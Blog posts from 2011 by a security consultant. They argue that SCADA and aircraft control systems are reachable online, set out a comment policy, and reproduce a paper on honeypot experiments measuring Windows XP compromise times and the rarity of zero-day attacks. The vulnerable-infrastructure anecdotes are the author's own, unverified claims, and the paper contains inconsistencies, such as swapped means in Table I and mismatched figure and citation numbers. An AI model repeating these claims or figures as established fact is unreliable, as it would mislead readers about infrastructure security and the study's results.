Saturday, 24 September 2011

Security News and Views

This weeks podcast is now up.

FACT CHECK - SCADA is online now

A recent "Fact Check" by Scot Terban requires some fact checking.

In his post, he basically shows that he has no idea how many SCADA systems are online. Scot stated "How about the fact that said systems are connected to the internet on a regular basis and SCADA aren’t", well this is a flaw and error of epic magnitude.

The fact is, nearly everything is connected now.

In 2000 I contracted to the Sydney Olympic authority. To make the Olympics run smoothly, they NSW government officials decided to connect control systems into a  central head-quarters. We linked:
  •          Traffic systems
  •          Rail systems
  •          Water systems
  •          Power systems
  •          Emergency response systems / Police
  •          Sewerage systems
That was only the tip of the iceberg. The rail systems had been connected to report on rail movements. They used a Java class file that was set to read the signals devices. The class was not protected, but the read only status was considered sufficient (despite protests to the contrary).

The control class file was easy to reverse engineer and it was simple to toggle the controls in order to make it into a system that could send signals as well as report them. When I noted that I could reverse engineer the class file, the comment was "not everyone has your skills Craig, we do not think others can do this". Yet it is simple to reverse engineer a Java class file.

Once the Olympics ended, so did any funds to maintain the system. Nothing was done to remove the inter-connectivity, it was considered valuable, but like all systems that are not maintained, it has slowly become less and less secure.

These network remain connected even now, though many of the people involved in setting them up have left. In fact, many of these networks are not even documented and known by the current people in the various departments.

Two years ago, I was involved in a project to secure SCADA systems that run and maintain a series of power plants. This was canned. Not for funds, but as the SCADA engineers did not trust that firewalling their network would not have a negative impact. Right now, the only controls are routing based. Unfortunately, they also allow ICMP route updates, access from the file servers and source routing. Some of the systems are running on Windows 98, not XP, 98. The need for a zero-day does not exist, just some knowledge of the internal routes in the system.

Unfortunately the routes and network design of this organization (running a large percentage of power stations in NSW) was leaked in a vendor presentation - so it is also not difficult to obtain. It does take some effort to become knowledgeable about the systems and how they are run (and to not simply crash them) but the ISO 20000 processes are stored on the same network.

Let us see some other systems.

A while back now, but many of the same systems are in place in the same way, I was contracted to test the systems on a Boeing 747. They had added a new video system that ran over IP. They segregated this from the control systems using layer 2 - VLANs. We managed to break the VLANs and access other systems and with source routing could access the Engine management systems.

The response, "the engine management system is out of scope."

For those who do not know, 747's are big flying Unix hosts. At the time, the engine management system on this particular airline was Solaris based. The patching was well behind and they used telnet as SSH broke the menus and the budget did not extend to fixing this. The engineers could actually access the engine management system of a 747 in route. If issues are noted, they can re-tune the engine in air.
The issue here is that all that separated the engine control systems and the open network was NAT based filters. There were (and as far as I know this is true today), no extrusion controls. They filter incoming traffic, but all outgoing traffic is allowed. For those who engage in Pen Testing and know what a shoveled shell is... I need not say more.


Nearly all SCADA systems are online. The addition of a simple NAT device is NOT a control. Most of these systems are horribly patches and some run DOS, Win 95, Win 98 and even old Unixs. Some are on outdated versions of VMS. One I know of is on a Cray and another is on a PDP-11. The last of these has an issue as they do not believe it will ever restart if it goes down. So that PDP-11 is not touched. We scanned a system at that network a couple years back and it crashed, the answer was that we could not ever ping the PDP-11 as it was thought it could also crash.

Yes Scot, Windows XP and unpatched networks are a concern, but they are less of a concern than those systems that are connected to the world and which control physical systems.

Right now, the Commonwealth government here in Australia has a project to connect to IPv6 by next year. It is mandated. I have been traveling and presenting to many departments in the last few months for this reason. Even with all the good standards from DSD, few of the people who are tasked with implementing these systems knew that IPSec supports a NULL cipher. The DSD standards do say that you cannot use NULL as a cipher, but the awareness is only starting to grow (hence a very busy schedule actually talking to people in a number of government departments and letting them know these things).
Next year, we will have IPv6 starting to become the norm in the Australian Commonwealth Government and in time, it will be all there is. This starts with a IPv4-IPv6 gateway and transition project, but that is only the start and soon others will have to switch as well. Soon (and this is within 5 years), SCADA systems will be connected on IPv6 networks here in Australia. 

IPv6 is distributed. There are no crunchy firewalls on the outside and even NAT offers little. Scott (and others who run some of these systems), I suggest that you have a look at how things are really configured.

On another note, I look forward to seeing those in Melbourne next week at BOM when we have our IPv6 workshop. If you have a read of the DSD guidelines first, it will add further value to the session.

About the Author:
Craig Wright is the VP of GICSR in Australia. He holds both the GSE, GSE-Malware and GSE-Compliance certifications from GIAC. He is a perpetual student with numerous post graduate degrees including an LLM specializing in international commercial law and ecommerce law, A Masters Degree in mathematical statistics from Newcastle as well as working on his 4th IT focused Masters degree (Masters in System Development) from Charles Sturt University where he lectures subjects in a Masters degree in digital forensics. He is writing his second doctorate, a PhD on the quantification of information system risk at CSU.

On Censoring Comments.

In the comment fields I manage to see a number of those that do not make it to display. These are either SPAM or Anonymous ones with problems.

The first lesson for those ignorant people who thing they have an inbuilt right to post on here is that this is not a public forum, it is my blog. Not theirs, mine. On this, I distribute my research and other things of interest in economics and mostly security.

The first lesson that some people will learn if they do not wish to be blocked is that foul language will get you nowhere. I do not post comments that are insulting and which offer nothing but gutter language.

I will and do post comments that disparage what I am doing and allow dissenting opinions. I am happy for you to point of errors that I have made and I will even add an update to the comments with my own saying what the error is alongside the comment that pointed the error out.

I have and do at times allow some people to make comments that are borderline when they are not simply anonymous cowards.

Friday, 23 September 2011

Who uses zero days?

My college (Tanveer Zia) and I presented a paper at CACS 2011 this week titled:
Of Black Swans, Platypii and Bunyips: The outlier and normal incident in risk management
It can also be downloaded from the SANS Reading Room.

In the two years this experiment ran, we experienced (over 640 hosts and 620 days running) no zero-day attacks on any system. We recorded the attacks in pcaps, so there is many years worth of analysis to be completed by our future doctoral students, but no zero days where noted even when we re-ran the data a year or more following the attack.

Basically, what we are showing is that zero-day attacks are too overhyped. What matters is not the vendor spin on 0-days, but rather the basics. Patching, good design and human awareness controls. We did not test browser interaction with users in this experiment, that is a future paper. There is only so much one can do in a single experiment.

On to the paper.

AbstractTo act rationally requires that we forecast the future with inadequate information using the past as a guide for all its flaws. We make decisions in the absence of knowledge. We state that black swans and bunyips do not exist. From time to time, we find that we have decided in error and black swans are found. However, for every black swan, there is a unicorn, dragon and Bunyip that does not exist and of which we remain confident will never be found.

Zero-day security vulnerabilities remain the fear of many security professionals. We present empirical evidence as to the rarity of these events as a source of system compromise. Instead, we demonstrate how common misconfigurations and old attacks are far more of a concern to the security professional. We show that predicting zero-day attacks is possible and that defending systems against common vulnerabilities significantly lowers the risk from the unexpected and “unpredictable”.

The inherent psychological biases that have developed in the information security profession have centered on the outlier effect. This has led to a dangerously skewed perspective of reality and an increase in the economic costs of security. This paper demonstrates that producing resilient systems for known events also minimizes the risk from black swans without the wasted effort of chasing myths.

Keywords-component; Information Security, Economics, Risk, Black swans.

I. Introduction

The fallacy of the black swan in risk has come full circle in information systems. Just as the deductive fallacy, “a dicto secundum quid ad dictum simpliciter” allowed false assertions that black swans could not exist when they do, we see assertions that risk cannot be modeled without knowing all of the ‘black swans’ that can exist. The falsity of the black swan argument derives from a deductive statement that “every swan I have seen is white, so it must be true that all swans are white”. The problem is that which one has seen is a subset of the entire set. One cannot have seen all swans.

Likewise, the argument that not enough weight applies to zero-day vulnerabilities and that these are a major cause of system intrusions relies on the same reasoning. The assertion that more compromises occur because of zero-day vulnerabilities comes from a predisposition to remember the occurrence of a zero-day attack more often than one remembers a more frequently occurring incident. Whereas near eidetic recall comes from events that are unusual, common events are more often forgotten [23]. This leads to treating common events as if they matter less than they should.

Taleb [20] formulated the Black Swan Theory with the assertion that unpredictable events are much more common than people think and are the norm and not the exception. In this, he has fallen into the logical fallacy and trap against which he rails. This fallacy of arguing from a particular case to a general rule, without recognizing qualifying factors lead people, before the exploration of Australia, to state that black swans could not exist instead of stating that it is unlikely that they exist. When Australia was finally explored, Platypii and Bunyips where reported along with black swans. At first, many refused to believe that a creature such as the platypus could be possible. The scientific discovery and examination of these creatures was unlikely, but far from impossible as their existence demonstrated. The discoveries of such an unexpected creature lead others to believe that Bunyips could also exist. They tried to assert that the discovery of other unlikely creatures made the discovery of the Bunyips more likely.

Though it is still possible that this is or at least was the case, the existence of Bunyips remains incredibly unlikely. In fact, it is so unlikely that we could state that Bunyips do not exist with a reasonable level of certainty. Many people have spent large amounts of money searching for mythical creatures. At times in the past, some have been discovered true. The fact remains, more monsters exist in our minds than could ever exist in the world.

For many years, information security and risk management has been an art rather than a science. This has been detrimental to the economy as a whole as well as to the operations of many organizations. The result has been a reliance on experts whose methodologies and results can vary widely and which have led to the growth of fear, uncertainty and doubt within the community. Although many true experts do exist, some of whom exhibit an insightful vision and ability, for each true expert, many inexperienced technicians and auditors abound.

This failure to be able to expend resources in securing systems has created a misalignment of controls and a waste of scare resources with alternative uses. This paper aims to demonstrate that the common risk is the one against which to protect. Zero-day vulnerabilities and strange events are memorable, but this does not make them the target of an effective risk mitigation program. It also does not mean that they are the most likely event that will occur. Unusual and excepted events upset a number of models and methods that are common in many other areas of systems engineering, but which are only just starting to be used in the determination of information systems risk. This issue is not the one that should be considered. These processes can help both the inexperienced security professional as well as adding to the arsenal of tools available to the consummate expert. In place of searching for bunyips, we should implement systems that cover the majority of failures and prepare to act when unusual events emerge.

The standard systems reliability engineering processes are applicable to information systems risk. These formula and methods have been widely used in systems engineering, medicine and numerous other scientific fields for many years. The introduction of these methods into common use within risk and systems audit will allow the creation of more scientific processes that are repeatable and do not rely on the same individual for the delivery of the same results. Some failures will occur. A 99% confidence interval, though considered a good measure, brings a level of uncertainty, by definition. The issues are that it is unwise to discard the normal occurrences in favor of a black swan that may turn out to be something else again. By assuming that all black swans lead to catastrophic and unpredictable failure, we are again destroying the exception.

II. An investigation into the causes of system compromise

In order to test the causes of system compromises, we configured 640 Windows XP Professional systems that were on virtual hosts. The placement of each of the hosts was on an IP address external to a network firewall. Three separate tests formed the foundation of the experiment. For this, we set the baseline security of the system as a CIS (Centre for Internet Security) score. The CIS Windows XP Professional Benchmark v.2.0.1 [24] formed the security test metric.

These are:
  1. A base install of a Windows XP SP 2 system.
  2. An increasing CIS score was configured on the hosts.
  3. A snort IDS was used to separate worms and other automated malware from interactive attacks.
Network traffic monitors were used in order to determine if a system had been compromised. The hosts had no third party applications and initially had auto-updating disabled. A host, when compromised was reset and reconfigured for the next set of survival tests. The reset utilized the VMware ‘snapshot’ feature to take the system to a known good state [see 16,17,18].

In this paper, we have defined a zero-day attack as one that is generally unknown. Some authors [26] define a zero-day attack as a “flaw in software code is discovered and code exploiting the flaw appears before a fix or patch is available. Once a working exploit of the vulnerability has been released into the wild, users of the affected software will continue to be compromised until a software patch is available or some form of mitigation is taken by the user”. For the purpose of this paper, we have defined a zero-day attack, as one that uses computer vulnerabilities that do not currently have a solution. This includes patching from the vendor, third party patches or workarounds. In this way, a vulnerability with a CVE number and third party protection (such as IPS filters or anti-malware updates that stop the attack) is not defined as a zero-day attack for the purpose of this paper.

Figure 1. Survival times with the Windows Firewall Disabled.

This aligns with the definition of a “zero-day exploit” occurring “when the exploit for the vulnerability is created before, or on the same day as the vulnerability is learned about by the vendor” [23]. This is a superior definition of the term and should be used in place of the former. Many vulnerabilities remain unpatched for many months with user and vendor knowledge. These are commonly stopped using alternative approaches and work-arounds in place of vendor patches.

The reason for this lies in the ability to predict an attack. This paper seeks to measure the impact of controls that can be predicted and to compare these to attacks that have no known solution. A published attack with no official vendor patch may be mitigated and predicted. This type of an attack is not a ‘black swan’. The unpredictable requires an attack that unknown or unpublished. A select few experts could know of this type of vulnerability. This does not allow the public to have knowledge of this issue. As such, this limited knowledge would not lead to a generally deployed work around.

C. Modeling the impact of a single control

The first test process separated the hosts into two classes. Those with the Windows XP Firewall enabled, and those with the firewall disabled. No third party products (including anti-malware software) were used on either class of system. With the release of Windows Vista and Windows 7, the analysis of the impact of the inclusion of a firewall in Windows XP may seem a little dated. However, the same use and deployment of this control applies to both Windows 7 and Windows Vista. In addition, many organizations still use Windows XP.

The histogram in Fig. 1 displays the distribution of survival times for the un-firewalled Windows XP hosts. The Conflicker worm that managed to compromise the un-firewalled hosts in quick succession skewed this result. The quickest time being 5.4 seconds from the network cable being connected to a scan occurred (this was in May 2009). This was an exception and hence an outlier. The mean time to compromise of the hosts was just over 18 hours, with only 25% of the sample compromised in less than 3 hours.

Figure 2. Survival time for Windows XP classified by interactive attacks and Automated malware (Worms).

When the results of the firewalled and un-firewalled hosts are compared, we can confidently assert that the Windows host firewall is a control that has a statistically significant effect when used. We say 'if', as this a control that is commonly overlooked or disabled. The results from enabling the Windows firewall are displayed in Fig 2 and a side-by-side box plot is displayed in Fig 3. With the firewall enabled, the mean survival time of the Windows XP SP2 systems increased to 336 days. No system with this control enabled was compromised in less than 108 days. With the maximum survival time for an unpatched and un-firewalled Windows XP system predominantly measured at less than 5 days and the minimum compromise time at 108 days with the enabling of the firewall and no additional patching, it is hard not to conclude that the Windows Firewall makes a statistically significant difference to the security of the system.

We used the Snort IDS for this exercise. This provided the details of the attacks allowing an analysis of worm (automated) compromises against manual (attacker, script kiddies etc). The IDS sat between the Internet connected router and the virtualized Windows XP hosts. Any outgoing traffic was investigated.
In the results of the 640 hosts that were used for this experiment, no system was compromised with a zero-day attack. Many new and novel attacks against known vulnerabilities did occur, but not a single compromise was due to an unreported vulnerability. Further, no attack without a patch was used to compromise any of the systems. This means that if the systems had been patched, none of the attacks would have succeeded.

Figure 3. Comparing the use of the Firewall to an unprotected XP system.

In a simple test of a single control, the enabling of this control had a marked effect on the survivability of the system. We see that leaving the host running with the firewall enabled provided a good level of protection (without a user on the system). This does not reflect a true Windows XP system as any third party applications and user action have been introduced to confound the results. All connections to these hosts are from external sources (such as a server model) to the host and no users are browsing malware-infected sites. In general, a Windows XP system will have a user and will act as a client. This introduces aspects of browsing and retrieving external files (e.g. email). These aspects of the host’s security will change the survival rates of a system, but we can see that there is a significant advantage from even a simple control.

TABLE I. Survival Times

Statistical Analysis of Survival times
Windows Firewall Enabled Windows Firewall Disabled
Mean 18.157 Hours 8,064.640 Hours

t = -170.75
df = 2272
p-value = 2.2 Exp -16

The boxplot (Fig 3.) and the results of a Welch 2 sample t-test (Tab. 1) demonstrate that the two conditions are statistically distinct at a significant level (where alpha = 1%). With a p-value < 2.2 Exp -16, it is possible to reject a null hypothesis of no significant improvement and state that there is overwhelming evidence in favor of deploying the Windows XP firewall (or an equivalent).

The regret is that in a sample of 136 home systems from corporate computers that have been tested and a sample of 231 systems inside various corporate networks, few systems ran a firewall. Of the hosts tested, 31.28% (or 23 systems) had the Windows XP Firewall or a commercial equivalent installed and running. Of the internal systems tested in this study, 6.1% had an internally (inside the corporate firewall) enabled firewall (14 hosts). The ability to enable IPSec and Group Policy within a corporate environment is a control that is generally overlooked or bypassed. The results of enabling (or rather not disabling) the Windows Firewall produce a pronounced benefit to the survivability of systems.

Figure 4. Survival time for Windows XP classified by interactive attacks and Automated malware (Worms).

In this first experiment, we see marked benefits from a simple control without the worry of any black swan effect.

D. Modeling system survival by attack class

In the previous section, the results of a series of hazard modeling experiments on Windows XP was limited to a base install and the use or disabling of the firewall. We next altered the experiment to investigate the attacks in classes. In particular, comparing the systems that have been compromised by an automated process (Worms etc) against those which have at least some level of interaction.
Each of the systems was reset and configured with a varying level of controls. The CIS metrics where calculated using the automated tool. Systems were distributed evenly between the metrics in 5% intervals (that is, 32 systems were allocated to each 5% bracket). The systems have been made either more secure or less secure by enabling and disabling controls until a complete spread of scores was created.

Fig. 4 and Fig. 5 display a significant difference in the patterns of compromise due to automated and interactive attacks. We can see from the plots that worms act faster against vulnerable systems and that interactive users (attackers) are more capable at compromising more secure systems. This is more easily seen on an overlay plot (Fig. 5). This displays a plot of the survival time against automated processes (green) overlaid with that of manual processes (red). The Loess fit for each is also incorporated into the plot.

Figure 5. Automated vs Interactive attacks and survival times.

What we see from other results is that the more secure a system is (in this case patched of known vulnerabilities), the more likely that a compromise is manually initiated. Likewise, less secure (or patched and vulnerable) systems are exposed to more automated attacks (e.g. Worms).

E. System Modeling by CIS Metric

A selection of 48 Windows XP SP2 computers was used for a test that incorporated both 16 physical hosts and 32 virtual machines. This was conducted in order to examine the differences (if any) that may result with a virtualized host in place of a physical host. The tests were run over a 600 plus day period starting from November 2007. When a physical host was compromised, it was taken offline for 10 days. In this period, the host was rebuilt in a slightly different configuration. The 32 virtual hosts where built with differing levels of patching. These hosts have been reverted to a VM snapshot following a compromise. At this point, they would be re-patched and reassessed.

The same Snort IDS system used in the previous experiment was deployed to measure the attacks against the physical hosts. The 32 virtual hosts were configured on a single high-end Red Hat server running Snort. No filtering was conducted, but all attacks were logged. The survival time for the host is set as the time from when the host was placed as live on the network until a local compromise occurred. The 16 physical hosts where connected to a Cisco switch sitting behind a Redhat Linux host running Snort and acting as a forwarding router.

Each host in both the physical and virtual configuration was configured on a '/29' network. This was assigned an internal IP in the 10.x.y.z address ranges with the Redhat host being assigned the lower IP address and the upper to the host being tested. Static NAT was used to pass a real IP address to the host in the range of 203.X.Y.194 to 203.X.Y.242 with a netmask of The full address is not reported at this time in order to minimize any impact on ongoing experiments.

Figure 6. Survival for Physical vs Virtual hosts.
The iptables configuration on the two Redhat systems was configured to allow any IPv4 traffic from the Internet and to block any IPv6 traffic. The Redhat host did not have a publically routable IP address. Internet hosts were allowed to connect to any system on any port. The only restriction was designed to block traffic to and from the Windows XP hosts to any other host on the same network. This allowed the host to be compromised from the Internet but a compromised host could not see another host on the same network. The Windows XP firewall was disabled for all CIS scores less than 90 and for some hosts with scores greater than 90 (although it is difficult to create a host with a score greater than 90 and the firewall disabled).

This was done to create a level of independence with attackers having to compromise systems from the same way and not being able to "hop" across systems (as occurs in real compromises). The goal of this experiment was to record initial compromises and not the subsequent process (that being the goal of a separate and ongoing experiment). The times and measures have all been recorded and analyzed. As before, no web browsing or other internal activity was conducted from the systems under test.

The scatterplot (Fig. 6) is the plot of the measures score using the CIS scoring system against the time that it took to compromise the host. We see that there was a significant benefit in achieving a score of 80+. Any score of less than 40 was compromised relatively quickly. A score of 46 was compromised within 24 hours. All scores of 60+ remained uncompromised for at least a week. One host with a score of 59 on the CIS scale remained uncompromised for 98 days.

Similar results have been recorded for the hosts in the VM group (blue) and the physical group (red) in the scatter plot (Fig. 6). A Loess best fit has been applied to this scatter plot marking the expected survival time by CIS scoring. As the score increases, the variance also increases, but this can be seen as a function of increasing survival times. No statistically significant differences in survival times have been noted because of the host being virtualized or physical.

From these results, we can assert that automated systems are more likely to compromise poorly configured systems than well-configured ones. This result is no more than common knowledge; however, we also see that an interactive attacker is more likely to succeed in compromising a well-configured system when compared to an automated process. We also see that even the best-configured system fails in time.

Figure 7. Mapping survival by critical vulnerabilities.
Again, no system failed from an unknown attack. Of note was that several systems where compromised using new but known attacks. In the majority of attacks against a system with a CIS score of greater than 60 and with the Windows firewall enabled, the system was compromised between patch cycles. This involved the attack occurring against a new vulnerability before the scheduled patch release was due. We further note, that in all instances, these attacks involved systems that are not interactively managed. Work-around existed for all of the incidents that lead to compromise of the more secure systems.
Further, more sophisticated anti-malware, firewall or other system security software would have stopped these attacks. This is why we have not classified these attacks as zero-days. The vendor did not have a public patch, but a work around or third party control existed in all instances.

The issue comes to economic allocation of scarce resources. Numerous solutions could have stopped all of the attacks against the secured hosts. Some of these solutions would have cost less than implementing the controls that gave the Windows system a greater CIS score.

F. Mapping survival time against vulnerabilities

The next part of the experiment involved the configuration of 16 Windows XP SP2 hosts with a set and measured number of critical vulnerabilities. We left these hosts unpatched (ranging from 1 to 10 unpatched vulnerabilities per host) for a selected set of vulnerabilities. The experiment involved applying all other patches for newer vulnerabilities as they became available. The particular vulnerability was randomly selected on each host. Each vulnerability was selected from the SANS Top 20 vulnerability list [25].

Figure 8. Attacker time by CIS metric.
All of the hosts used virtualization with ‘snapshots’ enabled. A host that was compromised was reassigned with a new IP address and was reactivated 14 days later. Reactivation involved restoring the host to the snapshot and patching it. The host was left with the same number of critical vulnerabilities, but a different set of vulnerabilities was selected randomly from the SANS top 10 list.

The results of the experiment provided a good model for predicting system survival. A system with a greater number of vulnerabilities is compromised quicker. This is a negative exponential relationship. Additional vulnerabilities exposed on a host increase the likelihood of compromise significantly. We can hence assert that the greater the number of vulnerabilities that a system has, the faster it is compromised. No system with six (6) or more unpatched network accessible vulnerabilities remained uncompromised for more than 15 days. A compromise occurred in as little as four (4) days on systems with two (2) vulnerabilities. A system with no critical vulnerabilities can be expected to survive for several months even without administrative interaction. Again, none of the attacks against these systems could be termed black swans. Each was known and predictable. In each case, known a work around existed.

G. Attack time by CIS Score

The time between the initial instigation of an attack until an attacker either moved on or compromised a host was analyzed for related systems. As we have no means to correlate between systems that an attacker may use, this value is lower in many cases than would be recorded if all the IP addresses used by a single attacker could be utilized. As such, this result is only indicative and does not take attacks from single attackers who use multiple addresses into account.

Figure 9. Attacker time by CIS metric and attack class.
In Fig. 3, we see that there is an inflection point on the amount of time spent attacking a system. More secure systems (a high CIS metric) would appear to discourage attackers where unsecure systems (a low CIS metric) are quickly compromised. Some attackers are determined and will continue to attack a host for extended periods in time. Even when an attacker gets little or no positive feedback, many continue to test a system over time.

This holds result even more strongly when the attack class is separated by automated and interactive attacks (Fig. 9). Automated attacks have a low amount of time on the system due to compromise. When a system is not compromised, they display little intelligence into the attack patterns deployed against a host. An interactive attack displays a marked drop in the time per host as the security metric increases. As the host exhibits fewer vulnerabilities, the attacker spends less time exploring the host. It must be noted that the attackers are random in this experiment. The distribution of attackers is unlikely to contain dedicated attackers who are targeting a particular site (such as many cyber criminals and ‘hactivists’ would do [13]). The hosts appear as normal corporate and home systems. No information was provided to the attacker that would enable them to associate the hosts with any particular organization.

II. Discussion

User interactions affect survival times in the real world. This will of course change the models produced by this experiment. The modeling of complete interactive systems was outside the scope of the experiment, but user actions can be modeled [22] with more advanced techniques (such as clustering algorithms). The results of the experiments presented demonstrate that the focus on zero-day or black swan events is misplaced. These can cause damage, but they are no more likely to damage a system than an attack using a well-known vulnerability that has not been patched. As Anderson [1] notes, this is hard. The economic costs [2] of maintaining a system with all the required patches for all applications are frequently greater than the cost of purchasing and installing the software.

The problems with focusing on zero-day attacks are two-fold. First, the number of attacks that occur from true [6] zero-day events are minimal. These incidents also cause the same damage as an incident that has resulted from a known vulnerability. This is, a system compromise is a system compromise. The impact of this being a result of a previously unknown attack is minimal in comparison to the result of the compromise itself.

Next, and more importantly, the total number of negatives is too large. There are simply too many black swans. For every attack that can succeed, there are a near infinite number of possible attack vectors, most of which never occur and will never occur. One such example is the oft-recurring argument as to the possibility of an attack against a fax server running on an analogue line[1]. Much effort that could have been better applied to securing known issues has been applied to such Bunyips. Even where zero day events occur as a platypus (that is a completely unexpected event that few would have believed possible), the impact is rarely greater [3,4,6,7] than a compromise from an issue that was exposed but known.
As Carroll, 1872 [80] noted when parodying Victorian inventions, we change little and often give little thought to the economic allocation of funds to mitigate risk.

"I was wondering what the mouse-trap was for." said Alice. "It isn't very likely there would be any mice on the horse's back."
“Not very likely, perhaps," said the Knight; "but, if they do come, I don't choose to have them running all about."
A focus on the unknown at the expense of the basics is foolhardy at best. We can expend effort on addressing all possible and even unknown issues like Carroll’s knight, but this will divert expenditure from those events with the greatest impact. By focusing on the unknown, we fail to address the issues that have the greatest impact [28]. The result of such an action is waste and loss [12]. By addressing the known issues, we also mitigate many of the unknown ones without trying.

Relative computer security can be measured using six factors [4]:
  1. What is the importance of the information or resource being protected?
  2. What is the potential impact, if the security is breached?
  3. Who is the attacker likely to be?
  4. What are the skills and resources available to an attacker?
  5. What constraints are imposed by legitimate usage?
  6. What resources are available to implement security?
In no event can we account for the unknown, but nor should we overly concern ourselves with it. Basic system hygiene and controls do more to counter black swan events in computer systems then does an effort to focus on the unknown. Of more concern is the limitation we place on responsibility. Focusing on software patches moves the responsibility from the user to the vendor. This makes it less likely [18] that the user will actively implement controls that can mitigate the issues that may occur through software bugs.

By limiting the scope of the user's responsibility, the user's incentive to protect their systems is also limited. That is the user does not have the requisite incentive to take the optimal level of precautions. Most breaches are not related to zero-day attacks [9]. Where patches have been created for known vulnerabilities that could lead to a breach, users will act in a manner (rational behavior) that they expect to minimize their costs. Whether risk seeking or risk adverse, the user aims to minimize the costs that they will experience. This leads to a wide range of behavior with risk adverse users taking additional precautions and risk neutral users can accept their risk by minimizing their upfront costs (which may lead to an increase in loss later).In any event, the software vendor as the cause of a breach is not liable for any consequential damages. This places the appropriate incentives on the user to mitigate the risk. As is noted below, the vendor has the incentive to minimize the risk to their reputation [27].

The behavioral effect of Loss Aversion (defined as propensity of information security professionals to minimize the impact of loss even against risks that have expectation values of greater gain) should be explored in association with concepts of social capital and cognitive biases such as the endowment effect (for instance where an individual is “willing-to-reveal” at high price, “willing-to-protect” at low price). These issues will be appraises against psychological propensities for both anchoring and adjustment and the Status quo bias (the predisposition to resist changing an established behavior, unless incentive is overwhelmingly compelling). The open question is why are we more willing to blame vendors then to fix our systems and how can we align this to effect a more positive outcome?

The valence effect (as is associated with an individual’s overestimation of the likelihood of favorable events being associated and impacting oneself) could be modeled in association to its impact and causal relationship with respect of information security and the feedback effect from rational ignorance and “Cold-Hot Empathy”. The failure to be able to expend resources effectively in securing systems has created a misalignment of controls and a waste of scare resources with alternative uses. The creation of models and methods that are common in many other areas of systems engineering, but which are only just starting to be used in the determination of information systems risk is feasible.

III. Conclusion

The optimal distribution of economic resources allocated against risks expressed across information systems in general can only lead to a combination of more secure systems for a lower overall cost. The reality is that, as with all safety issues, information security derives from a set of competing trade-offs between economic constraints. The goal of any economically based quantitative process should be to minimize cost and hence minimize risk through the appropriate allocation of capital expenditure. To do this, the correct assignment of economic and legal liability to the parties best able to manage the risk (this is the lowest cost insurer) is essential. This allocation is what requires assessment. This will allow insurance firms to develop expert systems that can calculate risk management figures that can be associated with information risk. This will allow for the correct attribution of information security insurance products. These, when provided to businesses generally, will provide for the black swan incident.

It is rare to find that the quantification of an externality or the quantitative and qualitative effects on those parties affected by, but who are not directly involved in a transaction, has occurred. This is despite this calculation forming an integral component of any risk strategy. The costs (negative) or benefits (positive) that apply to third parties are an oft-overlooked feature of economics and risk calculations. For instance, network externality[2]attributes positive costs to most organizations with little associated costs to themselves. In these calculations, the time-to-market and first-mover advantages are critical components of the overall economic function with security playing both positive and negative roles at all stages of the process.

The processes that can enable the creation and release of actuarially sound threat-risk models that incorporate heterogeneous tendencies in variance across multidimensional determinants while maintaining parsimony already exist in rudimentary form. Extending these though a combination of Heteroscedastic predictors (GARCH/ARIMA etc) coupled with non-parametric survival models will make these tools more robust. The expenditure of further effort in the creation of models where the underlying hazard rate (rather than survival time) is a function of the independent variables (covariates) provides opportunities for the development of quantitative systems that aid in the development of derivative and insurance products designed to spread risk.

In spreading the risk from outlier or black swan events, organizations can concentrate their efforts into obtaining the best return from their scarce resources. There are far more bunyips than black swans. If we expend excessive resources looking for bunyips and black swans, we will find these from time to time but we will then miss the white swans. Focus on outlier risk incidents is unlikely to decrease the risk faced by an organization in mitigating the black swan event whether a consequence of a zero-day vulnerability, or a new form of attack. This approach will divert resources away from known risks and make these more likely. This lowers the level of security applied to an organization whist still doing nothing to remove the discovery of an unexpected platypus from time to time. Conversely, good security practice, which leads to the minimization of risk through stopping known events, makes black swans incidents less likely. Good risk and security practice as expressed against known issues also minimizes the impact of zero-day and other outlier incidents.
[1] Anderson. R. (2001) “Why information security is hard – an economic perspective”. In 17th Annual Computer Security Applications Conference, pp. 358–365.
[2] Arora, A., Nandkumar, A., & Telang, R. (2006). “Does information security attack frequency increase with vulnerability disclosure? An empirical analysis”. Information Systems Frontiers, (8:5), pp 350-362.
[3] Arora, A., Telang, R., & Xu, H. (2004). “Optimal policy for software vulnerability disclosure”. The 3rd annual workshop on economics and information security (WEIS04). University of Minnesota.
[4] Aycock, J. “C omputer Viruses and Malware” Advances in Information Security, Vol. 22, Springer US
[5] Bednarski, Greg M. and Branson, Jake; Carnegie Mellon University; “Information Warfare: Understanding Network Threats through Honeypot Deployment”, March 2004
[6] Bradley, T. “Zero Day Exploits, Holy Grail Of The Malicious Hacker” Guide
[7] Campbell, K., Gordon, L. A., Loeb M. P. & Zhou. L. (2003) “The economic cost of publicly announced information security breaches: empirical evidence from the stock market. In J. Comput. Secur. 11, 431.
[8] Carroll, L. (1871) “Through the Looking-Glass And What Alice Found There” Macmillan, USA
[9] Cohen, P. S. “Rational conduct and social life.” Rationality and the Social Sciences: Contributions to the Philosophy and Methodology of the Social Sciences 1976
[10] Devost Matthew G..”Hackers as a National Resource. Information Warfare –Cyberterrorism: Protecting Your Personal Security in the Electronic Age”. WinnSchwartau (Ed). Second Trade Paperback Edition. New York: Thunder’s Mouth Press, 1996.
[11] Fowler., C. A. & Nesbit.R. F. “Tactical Deception in Air-Land Warfare” .Journal of Electronic Defense. June 1995
[12] Friedman, Milton. "The Methodology of Positive Economics." In his Essays in Positive Economics. Chicago and London: Chicago University Press, 1953.
[13] Gordon, S. & Ford, R. “Cyberterrorism?” Symantec Security Response White Paper 2002.
[14] Halderman, J. (2010) "To Strengthen Security, Change Developers' Incentives," IEEE Security and Privacy, vol. 8, no. 2, pp. 79-82.
[15] Honeynet Project & Research Alliance, “Know your Enemy: Trend Analysis”, 17th December 2004,
[16] Honeynet Project & Research Alliance, “Know Your Enemy: Honeynets in Universities - Deploying a Honeynet at an Academic Institution”, 26th April 2004,
[17] Honeynet Project & Research Alliance, “Know your Enemy: Tracking Botnets - Using honeynets to learn more about Bots”, 13th March 2005,
[18] Katz, M. L. & Shapiro. C. (1985) “Network externalities, competition, and compatibility”. In The American Economic Review 75, 424.
[19] Marti, K. (2008) "Computation of probabilities of survival/failure of technical, economic systems/structures by means of piecewise linearization of the performance function", Structural and Multidisciplinary Optimization, Vol35/3, Pp 225 - 244.
[20] Nassim Nicholas Taleb. The Black Swan: The impact of the highly improbable. Random House: New York, 2007
[21] Ozment, A.& Schechter. S. E. (2006) Bootstrapping the adoption of internet security protocols. In Fifth Workshop on the Economics of Information Security.
[22] Ramesh Kumar Goplala Pillai, P. Ramakanth Kumar, "Simulation of Human Criminal Behavior Using Clustering Algorithm," iccima, vol. 4, pp.105-109, International Conference on Computational Intelligence and Multimedia Applications (ICCIMA 2007), 2007
